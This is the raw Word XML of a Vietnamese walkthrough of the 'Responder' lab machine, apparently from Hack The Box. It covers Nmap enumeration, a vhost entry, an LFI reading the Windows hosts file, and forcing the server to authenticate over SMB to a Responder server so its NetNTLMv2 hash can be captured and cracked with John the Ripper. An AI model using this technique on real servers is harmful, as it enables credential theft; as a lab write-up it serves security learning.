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C036D" w14:textId="386AB025" w:rsidR="002F49FE" w:rsidRPr="004B3F9D" w:rsidRDefault="004B3F9D" w:rsidP="004B3F9D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B3F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF448FD" w14:textId="09A1120B" w:rsidR="004B3F9D" w:rsidRDefault="004B3F9D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653C2DFB" w14:textId="200C0809" w:rsidR="004B296A" w:rsidRPr="004B296A" w:rsidRDefault="004B296A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B296A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC68B53" w14:textId="77777777" w:rsidR="004B296A" w:rsidRDefault="004B296A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033DD47D" w14:textId="50BCF317" w:rsidR="004B3F9D" w:rsidRPr="004569DA" w:rsidRDefault="004B3F9D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta sẽ bắt đầu quét máy chủ đang mở cổng và chạy dịch vụ nào bằng Nmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829FAC4" w14:textId="02157CE7" w:rsidR="004B3F9D" w:rsidRPr="004569DA" w:rsidRDefault="004B3F9D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D655D19" w14:textId="53B6D01D" w:rsidR="004B296A" w:rsidRPr="004569DA" w:rsidRDefault="004B296A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="275ABA49" wp14:editId="53BC3193">
            <wp:extent cx="5943600" cy="2235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14:paraId="45A84D1D" w14:textId="3DF9755A" w:rsidR="004B3F9D" w:rsidRPr="004569DA" w:rsidRDefault="004B3F9D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Máy chủ đang chạy </w:t>
      </w:r>
      <w:r w:rsidR="00FF2DA8" w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dịch vụ web ở cổng 80 </w:t>
      </w:r>
      <w:r w:rsidR="00BA6FB4" w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:r w:rsidR="00FF2DA8" w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> WinRM ở cổng 5985.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2617D6A3" w14:textId="7B91F5FD" w:rsidR="00BA6FB4" w:rsidRPr="004569DA" w:rsidRDefault="00BA6FB4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2996F5C1" w14:textId="7C5C1AE4" w:rsidR="00BA6FB4" w:rsidRPr="004569DA" w:rsidRDefault="00BA6FB4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows Remote Management hay WinRM là 1 giao thức quản trị từ xa được dựng sẵn trong Windows sử dụng Simple Object Access Protocol (SOAP) để tương tác với các máy tính từ xa. WinRM cho phép người dùng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7480972F" w14:textId="704712FD" w:rsidR="00BA6FB4" w:rsidRPr="004569DA" w:rsidRDefault="00BA6FB4" w:rsidP="004B296A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giao tiếp và tương tác với các máy chủ từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2981D5CC" w14:textId="7F093D51" w:rsidR="007E4D6D" w:rsidRPr="004569DA" w:rsidRDefault="00BA6FB4" w:rsidP="004B296A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Thực thi lệnh từ xa trên </w:t>
      </w:r>
      <w:r w:rsidR="007E4D6D" w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">các </w:t>
      </w:r>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hệ thống</w:t>
      </w:r>
      <w:r w:rsidR="007E4D6D" w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không cục bộ nhưng kết nối được mạng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208243DD" w14:textId="089D041C" w:rsidR="007E4D6D" w:rsidRPr="004569DA" w:rsidRDefault="007E4D6D" w:rsidP="004B296A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Theo dõi, quản lý và cấu hình các máy chủ, hệ điều hành từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB35A8D" w14:textId="1DA5856D" w:rsidR="004B296A" w:rsidRDefault="004B296A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71FC74E5" w14:textId="3F75D8CA" w:rsidR="004B296A" w:rsidRPr="004B296A" w:rsidRDefault="004B296A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B296A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Website Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270A80F8" w14:textId="5BF8AB7E" w:rsidR="004B296A" w:rsidRDefault="004B296A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DD7D6A4" w14:textId="0725B1A9" w:rsidR="004B296A" w:rsidRPr="004569DA" w:rsidRDefault="004B296A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mở Firefox, tìm kiếm http://[target-ip], trình duyệt trả về thông báo không tìm thấy máy chủ. Nhìn thanh URL, nó hiển thị http://unika.htb. Trang web chuyển hướng trình duyệt đến 1 url mới và máy chủ của bạn không biết cách để tìm unika.htb. Máy chủ web đang chạy name-based Virtual Hosting để</w:t>
      </w:r>
      <w:r w:rsidR="00BD41E8" w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> xử lí các yêu cầu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D5F69" w14:textId="1DE20FC5" w:rsidR="00BD41E8" w:rsidRPr="004569DA" w:rsidRDefault="00BD41E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0483BD21" w14:textId="14E3DD69" w:rsidR="00BD41E8" w:rsidRPr="004569DA" w:rsidRDefault="00BD41E8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Name-based Virtual Hosting là 1 phương pháp để lưu trữ nhiều tên miền trên 1 máy chủ. Điều này cho phép một máy chủ chia sẻ tài nguyên như bộ nhớ và các </w:t>
      </w:r>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>chu kỳ xử lí mà không yêu cầu tất cả các dịch vụ phải được sử dụng bởi cùng 1 hostname.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B1C4D6" w14:textId="32D9085B" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B2250E4" w14:textId="7328FAB4" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Máy chủ web kiểm tra tên miền được cung cấp trong Host header để phản hồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0626BDE3" w14:textId="174F4F8F" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58ABED3A" w14:textId="1DD30E1E" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tập tin /etc/hosts phân giải hostname thành địa chỉ IP, do đó chúng ta cần thêm 1 dòng vào tập tin /etc/hosts để cho phép trình duyệt phân giải địa chỉ unika.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D14AFF" w14:textId="2C36F806" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D5BA6C" w14:textId="2A9E4755" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>echo "10.129.128.223 unika.htb" | sudo tee -a /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15234E77" w14:textId="0685E2C2" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5958D071" w14:textId="2D8EF2F5" w:rsidR="00C93ADB" w:rsidRPr="004569DA" w:rsidRDefault="00C93ADB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Thêm dòng này vào tập tin /etc/hosts cho phép trình duyệt phân giải tên miền unika.htb thành địa chỉ IP và thêm http header </w:t>
      </w:r>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Host: unika.htb </w:t>
      </w:r>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trong mỗi yêu cầu http</w:t>
      </w:r>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> máy chủ mới phản hồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600B77B2" w14:textId="32FBC793" w:rsidR="00E65C3C" w:rsidRPr="004569DA" w:rsidRDefault="00E65C3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00241910" w14:textId="0AEA2DD7" w:rsidR="00E65C3C" w:rsidRPr="004569DA" w:rsidRDefault="00E65C3C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Một trong những tập tin phổ biến nhất mà kẻ tấn công muốn truy cập trong Windows để xác định LFI là tập tin hosts, WINDOWS\System32\drivers\etc\hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ED3A9D" w14:textId="2BEE8B01" w:rsidR="00E65C3C" w:rsidRDefault="00E65C3C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79576367" w14:textId="107921CC" w:rsidR="00E65C3C" w:rsidRDefault="00E65C3C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1089FC43" wp14:editId="289FAB3E">
            <wp:extent cx="4084320" cy="14122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12821" t="10940" r="18462" b="51043"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4084320" cy="1412240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0566F2A3" w14:textId="1869A980" w:rsidR="00E65C3C" w:rsidRDefault="00D154C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D154C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder Challenge Capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28984F25" w14:textId="76210865" w:rsidR="00D154C4" w:rsidRDefault="00D154C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C4BEF3E" w14:textId="2A2BAEE9" w:rsidR="00D154C4" w:rsidRPr="004569DA" w:rsidRDefault="00D154C4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chúng ta biết ứng dụng web bị dính lỗ hổng LFI, có thể include 1 tập tin trên máy của kẻ tấn công. Nếu chúng ta chọn giao thức như SMB, Windows sẽ cố gắng xác thực với máy của chúng ta và chúng ta có thể lấy được NetNTLMv2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1E893" w14:textId="3DA437A1" w:rsidR="00D154C4" w:rsidRDefault="00D154C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FF6E85D" w14:textId="3A955DE5" w:rsidR="00D154C4" w:rsidRPr="00D154C4" w:rsidRDefault="00D154C4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D154C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Using Respo</w:t>
      </w:r>
      <w:r w:rsidR="00FE6B6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D154C4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>der</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326278EB" w14:textId="06C5A1A5" w:rsidR="00D154C4" w:rsidRDefault="00D154C4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D6FB59" w14:textId="13FC8218" w:rsidR="00D154C4" w:rsidRPr="004569DA" w:rsidRDefault="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong tập tin cấu hình php.ini, “allow_url_include” đặt là “Off”, nghĩa là php không tải HTTP hoặc FTP URLs từ xa để ngăn chặn tấn công RFI. Tuy nhiên, nếu allow_url_include và allow_url_fopen đặt là Off, PHP sẽ không ngăn chặn tải các urls SMB. Chúng ta có thể lợi dụng điều này để đánh cắp NTLM hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59178D9C" w14:textId="77A09108" w:rsidR="001272F7" w:rsidRPr="004569DA" w:rsidRDefault="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E8C74E" w14:textId="74765934" w:rsidR="001272F7" w:rsidRPr="004569DA" w:rsidRDefault="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tham khảo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F2D0B8" w14:textId="2F6DC0B3" w:rsidR="001272F7" w:rsidRPr="004569DA" w:rsidRDefault="001272F7" w:rsidP="001272F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20865EB5" w14:textId="41DDC853" w:rsidR="001272F7" w:rsidRPr="004569DA" w:rsidRDefault="001272F7" w:rsidP="001272F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/lgandx/Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745ADFDB" w14:textId="34AB64AC" w:rsidR="001272F7" w:rsidRPr="004569DA" w:rsidRDefault="001272F7" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E41FD51" w14:textId="4AE33E4C" w:rsidR="001272F7" w:rsidRPr="004569DA" w:rsidRDefault="001272F7" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cách Responder hoạt động?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD9BFA1" w14:textId="5E994B0B" w:rsidR="004569DA" w:rsidRPr="004569DA" w:rsidRDefault="004569DA" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E0D0BE" w14:textId="152B0389" w:rsidR="004569DA" w:rsidRDefault="004569DA" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004569DA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder có thể</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> thực hiện nhiều tấn công khác nhau, nhưng trong tình huống này, nó sẽ cài đặt 1 máy chủ giả. Khi nạn nhân xác thực NTLM với máy chủ đó, Responder gửi lại 1 challenge để máy chủ mã hóa với mật khẩu của người dùng. Khi máy chủ phản hồi, Responder sẽ dùng challenge và phản hồi để tạo NetNTLMv2</w:t>
      </w:r>
      <w:r w:rsidR="00463B08">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Chúng ta không thể dịch ngược NetNTLMv2, chúng ta có thể thử nhiều mật khẩu khác nhau để xem có tạo được challenge-response giống nhau và nếu chúng ta tìm được, thì nó là mật khẩu. Điều này gọi là hash cracking, chúng ta sẽ làm bằng công cụ John The Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E334B0E" w14:textId="00D318FA" w:rsidR="00F36138" w:rsidRDefault="00F36138" w:rsidP="001272F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
